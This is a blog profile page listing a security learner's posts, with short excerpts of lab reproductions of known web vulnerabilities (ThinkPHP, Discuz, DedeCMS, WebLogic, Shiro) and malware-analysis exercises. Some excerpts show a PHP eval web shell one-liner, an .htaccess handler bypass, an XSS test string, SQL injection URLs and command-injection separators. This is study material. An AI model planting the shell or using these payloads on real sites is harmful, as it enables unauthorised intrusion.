自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(38)
  • 资源 (1)
  • 收藏
  • 关注

原创 CentOS7搭建LAMP

CentOS7搭建LAMP

2022-06-08 10:21:26 186 1

原创 ThinkPHP2-RCE漏洞复现

影响版本:PHP 5.2~5.6/e 修 正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。

2022-06-08 10:20:00 1155

原创 Shell编程基础

文章目录Shell编程Shell变量Shell 环境变量**参数位置变量**预定义变量**运算符****条件判断**case 分支**for 循环**while 循环**读取控制台输入**函数其他Shell编程linux 其他命令进入 Linux 终端,编写一个 Shell 脚本 hello.sh#!/bin/bashecho "hello world!"运行:# 方法1sh shell.sh# 方法2chmod +x shell.sh./shell.sh#! 告诉系统这个脚本

2022-05-08 10:21:05 230

原创 Discuz远程代码执行(CVE-2019-13956)

Discuz! ML远程代码执行(CVE-2019-13956)漏洞介绍:该漏洞存在discuz ml(多国语言版)中,cookie中的language可控并且没有严格过滤,导致可以远程代码执行。环境搭建:靶机:CentOS7(10.10.10.137)docker环境下载:https://codeload.github.com/rhbb/CVE-2019-13956/zip/refs/heads/master进入目录:docker-compuse up -ddocker ps -a

2022-05-04 19:36:08 1795

原创 DedeCMS_v5.7漏洞复现

DedeCMS_v5.7漏洞复现环境搭建:服务器:WinServer2008(10.10.10.143) + phpstudy2018DedeCMS版本:DedeCMS-V5.7-UTF8-SP2下载地址:https://pan.baidu.com/s/1GQjWSDe7IlMVsVJ7HvrBOw 提取码: i4wk0x01 URL重定向版本<=5.7sp2漏洞复现payload:http://10.10.10.143/Dedecms/plus/download.php?open

2022-04-06 17:45:15 10158 1

原创 Discuz任意文件删除

文章目录Discuz任意文件删除实验环境漏洞复现Discuz任意文件删除实验环境官方于2017年9月28日对源码进行了修复,这里验证的版本为Discuz3.2:Discuz3.2下载地址:https://download.comsenz.com/DiscuzX/3.2/Discuz_X3.2_SC_UTF8.zip服务器:Windiws Server 2008 SP2(10.10.10.142)攻击机:物理机(10.10.10.1)环境搭建好后开始安装DZ漏洞复现在服务器DZ根目录

2022-04-01 11:01:44 3797

原创 UDF提权复现

文章目录UDF提权复现环境搭建UDF提权原理提权过程UDF提权复现环境搭建靶机:虚拟机Win7+phpstudy2018​ mysql5.5.53​ php5.2.17攻击机:物理机在已经得到webshell的情况下,利用mysqlUDF提权,在靶机WIn7上创建administrator权限的用户UDF提权原理条件:得到服务器webshell,知道数据库账号密码且可以远程连接在udf.dll文件中,定义了名为sys_eval()的函数,该函数可以执行系统命令,通过该函数来完成系

2022-03-30 11:07:31 711 1

原创 文件包含漏洞

文件包含漏洞大多是Web语言都可以只用文件包含操作,其中PHP语言所提供的文件包含功能比较强大、灵活,所以包含漏洞经常出现在PHP语言中。但并不是只用PHP语言会出现包含漏洞PHP包含四个函数:include()、include_once()、require()、require()_oncerequire:找不到被包含文件时会产生致命错误,并停止脚本include:找不到被包含文件时会产生警告,并继续执行脚本require_ocne:与require相似,区别是如果文件中的代码已经

2022-03-23 08:46:52 197

原创 bWAPP-CSRF-ChangeSecret

实验环境:Win7-1(10.10.10.135):模拟用户机Win7-2(10.10.10.137)+bWAPP:模拟被攻击服务器kali(10.10.10.139):模拟攻击机实验过程:用户机登录服务器bWAPP:攻击者构造攻击页面,并部署在攻击机上:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.d

2022-03-22 10:12:16 187

原创 XSS漏洞

Cross Site Scripting反射型(不持久型)(中危)一次性,不会存储在数据库里<?php $name = $_GET['name']; echo "Welcome $name<br>";?>存储型(高危)存储在数据库中,每次打开都会执行代码DOM XSS不与后台服务器产生数据交互,通过前端的dom(Document Object Model)节点形成的XSS漏洞。' onclick="alert(123)">常用测试语句&

2022-03-21 11:05:28 4185

原创 命令执行漏洞

命令执行漏洞Windows下的管道符:|: 直接执行后面的语句||:如果前面的语句执行出错,则执行后面的语句,前面的语句只能为假&:如果前面的语句为假,则执行后面的语句,前面的语句可真可假&&:前面的语句为假直接出错Linux下的管道符:;:执行完前面的语句再执行后面的|:显示后面语句的执行结果||:当前语句执行出错,直接执行后面的语句&,&&同windowsPHP命令执行PHP提供了部分函数用来执行外部应用程序,例如:system()

2022-03-21 11:03:08 460

原创 Http协议详解

HTTP(HyperText Transfer Protocol)超文本传输协议Linux系统可以通过curl+url发起一次http请求,如果想查看请求头信息,可加上-IHttp协议详解:http是一种无状态协议,即web浏览器与web服务器之间不需要建立持久的链接,当web服务器返回响应后,链接就被关闭HTTP请求http请求包括请求行,请求头,请求体(请求正文)其中请求头与请求体之间有一个空白行HTTP响应http响应也由三部分组成,分别是响应行,响应头,响应正文响应正文与响应头之间

2022-03-18 10:05:48 115

原创 phpmoadmin 远程代码执行 (CVE-2015-2208)

phpmoadmin 远程代码执行 (CVE-2015-2208)描述: phpMoAdmin 是一个用PHP 开发的在线MongoDB 管理工具,可用于创建、删除和修改数据库和索引,提供视图和数据搜索工具,提供数据库启动时间和内存的统计,支持JSON 格式数据的导入导出。 moadmin.php 开头检查POST是否传输了object,随后内包含的if进行判断,这个过程即调用了当前类的saveObject方法,POST传入object参数的值带入eval后就造成了代码执行。环境搭建靶机:CentOS

2022-03-02 11:15:50 3466

原创 Weblogic反序列化漏洞(cve-2018-2628 )

Weblogic反序列化漏洞(cve-2018-2628 )环境搭建靶机:CentOS7(192.168.2.110:7001)监听机器:Win10:(192.168.2.105:6666)将环境vulhub的环境git到本地git clone https://github.com/vulhub/vulhub.git接着 cd weblogic/CVE-2018-2628docker-compose up -d至此环境搭建完毕漏洞利用工具包下载:mirrors / Lighi

2022-03-02 11:14:10 4782

原创 maccms-cve_2017_17733漏洞复现

maccms-cve_2017_17733Maccms是一套跨平台的基于PHP和MySQL快速建站系统。 Maccms 8.x版本中存在安全漏洞。远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。环境搭建靶机:CentOS7(192.168.2.110)利用本地vulfocus平台一键搭建maccms环境:环境搭建完成漏洞利用访问http://192.168.2.110:59973/index.php?m=vod-searchpost提

2022-03-02 11:11:54 3926

原创 upload-libs实验笔记

准备文件:shell.php<?php @eval($_POST['hummer']);?>.htaccess<FilesMatch "">SetHandler application/x-httpd-php</FilesMatch>Pass-1客户端js绕过①禁用浏览器的js功能②上传shell.jpg,通过BurpSuit抓包后将文件名修改为shell.php后发送即可Pass-2第二关在上传文件时会检查文件的MIME,在抓包后修改Cont

2022-03-02 11:10:04 201

原创 CVE-2019-15107Webmin远程命令执行漏洞复现

CVE-2019-15107 Webmin远程命令执行漏洞复现漏洞影响版本为Webmin<=1.920Webmin的是一个用于管理类Unix的系统的管理配置工具,具有网络页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。它已知在端口10000上运行。在重置密码功能中发现了一个错误,该错误允许恶意第三方由于缺少输入验证而执行恶意代码。环境搭建靶机:CentOS7(192.168.2.101)webmin在ssl模式下是无法显示界面的,我

2022-01-04 20:08:09 3679

原创 Vulfocus 复现weblogic_CVE-2020-2883漏洞

Vulfocus 复现weblogic_CVE-2020-2883漏洞影响范围Oracle WebLogic Server 10.3.6.0.0Oracle WebLogic Server 12.1.3.0.0Oracle WebLogic Server 12.2.1.3.0Oracle WebLogic Server 12.2.1.4.0环境搭建靶机:CentOS7(192.168.2.101)用vulfocus拉取本地镜像并开启:浏览器访问:192.168.2.101:52228/

2022-01-04 20:06:42 1131

原创 Struts2_048(CVE-2017-9791)远程代码执行漏洞EXP

Struts2_048(CVE-2017-9791)远程代码执行漏洞EXP官方描述:It is possible to perform a RCE attack with a malicious field value when using the Struts 2 Struts 1 plugin and it's a Struts 1 action and the value is a part of a message presented to the user, i.e. when using u

2022-01-04 20:06:04 2598

原创 shiro 反序列化 _CVE-2016-4437

1.环境搭建实验靶机:CentOS7(192.168.2.102)攻击机:Kali-Linux(192.168.2.101)在CentOS7开启docker容器:浏览器登录192.168.2.102:80802.漏洞利用影响版本:Apache Shiro <= 1.2.4下载shiro反序列化工具:Release ShiroExploit v2.3 · feihong-cs/ShiroExploit-Deprecated (github.com)填入靶机地址:对kal

2021-12-28 14:08:28 2814

原创 mongo-express 代码执行 (cve-2019-10758)

1.环境搭建项目地址:vulhub/mongo-express/CVE-2019-10758 at master · vulhub/vulhub (github.com)拉取项目:git clone https://github.com.cnpmjs.org/vulhub/vulhub.git[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-m0qN0Cum-1640341732202)(https://cdn.jsdelivr.net/gh/QJLONG/HUMME

2021-12-24 18:31:29 809

原创 CentOS7 搭建docker-vulfocus环境

CentOS7 搭建docker-vulfocus环境1.修改镜像源mv /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/CentOS-Base.repo.backup #备份源文件wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.aliyun.com/repo/Centos-7.repo #下载新的源(这里用的是阿里镜像) yum clean all #清除缓存yum

2021-12-24 18:29:00 1618 1

原创 封神台第一章:为了女神小芳

实验平台:封神台-掌控安全在线演练靶场第一章:为了女神小芳!传送门:http://rhiq8003.ia.aqlab.cn/实验目标:获取admin的密码点击查看新闻1,跳转到http://rhiq8003.ia.aqlab.cn/?id=1发现传递的参数名为id 判断有无注入点http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2未显示出新闻内容,说明存在注入点 判断查询字段数http://rhiq8003.ia.aqlab.cn/

2021-12-22 10:56:16 488

原创 实验Lab06

Lab6-1在这个实验中,你将分析在文件Lab06-01.exe中发现的恶意代码。问题1.由main函数调用的唯一子过程中发现的主要代码结构是什么?首先进行静态分析。[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oqhh9Qm6-1634635502619)(E:\学习笔记\我的坚果云\恶意代码分析实战\实验Lab06.assets\image-20210918171733306.png)]通过上=上图标记的几个函数发现,该程序可能会联网。接下来进行动态分析。

2021-10-19 17:50:10 301

原创 恶意代码分析实战5-1

恶意代码分析实战Lab5-1文章目录恶意代码分析实战Lab5-11.DllMain的地址是什么?2.使用Imports窗口并浏览到gethostbyname,导入函数定位到什么地址?3.有多少函数调用了gethostbyname?4.将精力集中在位于0x10001757处的对gethostbyname的调用,你能找出哪个DNS请求将被触发吗?5.IDAPro 识别了在0x10001656处的子过程中的多少个局部变量?6.IDAPro识别了在0x10001656处的子过程中的多少个参数?7.使用String

2021-09-16 20:00:44 400

原创 恶意代码分析实战3-3、3-4

Lab3-3问题1每次运行该程序都会多一个svchost.exe然后该进程自动结束问题2内存字符串和映像字符串不同,说明该程序对内存中的svchost进行了修改出现上图字符串一般是对键盘进行监听问题3、问题4该程序在系统中创建了practicalmalwareanalysis.log日志文件,我们打开该文件查看如下:可以看到该程序对键盘记录的结果Lab3-4问题1文件运行一瞬间后自动结束运行并将自身删除通过procmon不难发现该程序打开了一个cmd.exe问题2

2021-09-08 21:49:17 155

原创 恶意代码分析实战3-2

恶意代码分析实战3-2问题1Windows系统中在rundll32目录下执行如下命令:用regshot比较安装前后的注册表代码会在svchost进程中启动问题2执行命令如下,已经成功运行问题3通过查找Lab03-02.dll查找该程序发现是在svchost进程下运行的问题4我们可以在Process Explorer中查看该进程的PID,我们可以通过PID过滤问题5该程序执行时会在系统中写入如下文件除此之外,通过如下信息发现该程序将自己写在注册表的键值里面

2021-09-07 08:17:46 88

原创 恶意代码分析实战3-1

恶意代码分析实战3-1问题1将Lab3-1.exe文件拖入PEid中,发现该文件是加壳文件从导入表中可以发现只有一个导入的动态链接库 想要查看详细情况需要用到动态分析的方法问题2首先启动wireshark,procmon为procmon设置过滤器:启动完成后运行Lab03-01.exe我们首先分析procmon给出的信息:由于信息过多,我们对过滤器进行更详细的设置对函数WriteFile、RegSetValue进行过滤WriteFile函数将某个文件写在了改目录下面,初步鉴

2021-09-04 10:37:02 169

原创 恶意代码分析实战1-4

恶意代码分析实战1-4问题1发现58个引擎报毒问题2该文件没有被加壳 有VC++6.0编译问题3有PETools可以查看该文件是2019年8月30日编译的问题4从导入的动态链接函数可以发现该程序具有创建远程线程的功能,还可以打开一个程序,写入文件这三个函数是提权用的问题5用Strings工具进行分析可以判断该程序具有从该网址上下载程序并执行的功能,同时该程序还会将自身隐藏在系统目录中该网址可以作为基于网络的迹象问题6用source hacker将资源提取出来

2021-08-26 13:51:57 142

原创 恶意代码分析实战1-3

恶意代码分析实战1-3问题1发现60个引擎报毒问题2由图可以看出,改文件是FSG1.0进行加壳的,我们用LinxerUnpacker对其进行脱壳脱壳后可以看到该程序是有VC++6.0编译的问题3这三个导入函数说明该程序使用了CUM组件模型问题4用Strings工具筛选出可打印的字符:我们从中发现了一个网址,ad.html可能是一个广告网址,所以我们由此猜测刚程序的功能可能是打开一个广告该网址可以作为基于网络的迹象...

2021-08-26 13:50:39 187

原创 恶意代码分析实战1-2

恶意代码分析实战1-2Lab1-2问题1发现有51个引擎报毒问题2用工具PEid分析,如下图,发现该文件是由UPX工具进行加壳的利用FreeUpx工具进行脱壳处理脱壳后在查看问题3查看导入函数列表:OpenMutexA:打开一个互斥CreateMutexA:创建一个互斥CreateThread:创建一个线程CreateServiceA:创建一个服务连接网络的函数可以初步确定 该程序是要连接一个网站问题4用strings查看文件中可打印的字符发现该程序会连

2021-08-26 11:26:09 111

原创 恶意代码分析实战

恶意代码分析实战Lab1-1问题1将文件Lab01-01.exe直接上传至http://www.VirusTotal.com 结果如下:发现有四十七个报毒将文件Lab01-01.dll文件上传至http://www.VirusTotla.com 结果如下:发现四十个报错综上,证明已经匹配到了病毒软件特征问题2用工具PETools查看.exe文件的编译时间:用工具PETools查看.dll文件的编译时间:可以看出两个文件编译的时间几乎相同,可以判断是由同一位恶意代码作者编写的

2021-08-25 21:53:25 218

原创 爬虫实战:制作简单的页面采集器

以百度为例制作简单的页面采集器首先尝试利用百度搜做引擎搜索任意信息:url如下:观察可知 我们需要的URL如下:https://www.baidu.com/s?wd=123首先利用python脚本发送请求:import requestsurl = 'https://www.baidu.com/s'kw = input('please input your keywords:')param = { 'wd':kw}headers = { 'User-Agent':'Mo

2021-07-11 22:02:03 339

原创 selenium.common.exceptions.WebDriverException: Message: Service chromedriver unexpectedly exited.

python seleium.webdriver.Chrome()调用的时候报错:selenium.common.exceptions.WebDriverException: Message: Service chromedriver unexpectedly exited. Status code was: 1亲测,原因是调用Chrome()的时候找不到chromedriver.exe。解决方法如下:到Anaconda3\Lib\site-packages\selenium\webdriver

2021-07-05 19:55:27 4857 1

原创 python3爬虫实战:requests库+正则表达式爬取头像

python3爬虫实战:爬取情侣头像网站url:https://www.woyaogexing.com/touxiang/qinglv/new/浏览网页:可以发现每个图片都链接到了另一个网页我们需要获取主目录中的每个图片对应的另一个html页面的url,再从这些url中提取图片获得要爬取的网页的htmlimport requestsresponse = requests.get('https://www.woyaogexing.com/touxiang/qinglv/new/')respo

2021-07-04 13:12:04 432

原创 CentOS7搭建LAMP环境

CentOS7搭建LAMP环境首先关闭防火墙:systemctl stop firewalld.servicesystemctl disable firewalld.service1.搭建httpd查看是否已经安装了httpd:rpm -qa | grep httpd若无返回结果证明未安装过,直接安装即可:yum -y install httpd再次查看rpm -qa | grep httpd已经安装成功开启httpd服务:systemctl start httpd

2021-06-22 13:34:56 90

原创 sqli-labs实战(1-6)

Less-1注入点测试:http://127.0.0.1:8088/sqli-labs/Less-1/?id=1' and '1'='1http://127.0.0.1:8088/sqli-labs/Less-1/?id=1' --+由此判断为字符型注入http://127.0.0.1:8088/sqli-labs/Less-1/?id=1' order by 4 --+http://127.0.0.1:8088/sqli-labs/Less-1/?id=1' order by 3 --+

2021-05-24 17:12:18 73

原创 PHP基础

PHP基础1、注释单行注释:header("Content-type: text/html; charset=utf-8");# 注释内容 //多行注释:/*注释内容*/2、PHP常量define(常量名,常量值)例如:define('MY_NAME','PHP中文网');3、数据类型boolean 布尔型integer 整型float 浮点型string 字符串型array 数组object 对象整形八进制 以0开始十六进制0x开始

2021-05-15 18:51:04 143

TurboLaunch_2635.rar

快速启动

2021-05-15

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除